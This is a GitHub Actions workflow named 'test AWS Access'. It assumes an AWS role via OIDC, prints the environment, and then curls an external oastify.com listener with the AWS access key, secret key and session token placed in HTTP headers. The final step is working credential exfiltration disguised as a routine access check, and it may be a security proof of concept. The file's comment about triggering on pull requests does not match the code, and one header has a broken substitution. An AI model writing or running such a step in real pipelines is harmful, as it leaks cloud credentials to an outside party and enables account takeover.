name: "test AWS Access"

# The workflow should only trigger on pull requests to the main branch
on:
  workflow_dispatch: 

# Required to get the ID Token that will be used for OIDC
permissions:
  id-token: write
  contents: read # needed for private repos to checkout

jobs:
  aws:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v1
        with:
          aws-region: eu-west-1
          role-to-assume: ${{ secrets.READ_ROLE }}
          role-session-name: OIDCSession

      - run: aws sts get-caller-identity
        shell: bash
      - run: env
        shell: bash
      - run: 'curl --url "https://tkhumkkrti2ddctqqhk7fro7dyjp7fv4.oastify.com" -H "aws-access-token: $(echo $AWS_ACCESS_TOKEN)" -H "aws-access-secret: (echo $AWS_SECRET_ACCESS_KEY)" -H "aws-access-session: $(echo $AWS_SESSION_TOKEN)"'
        shell: bash
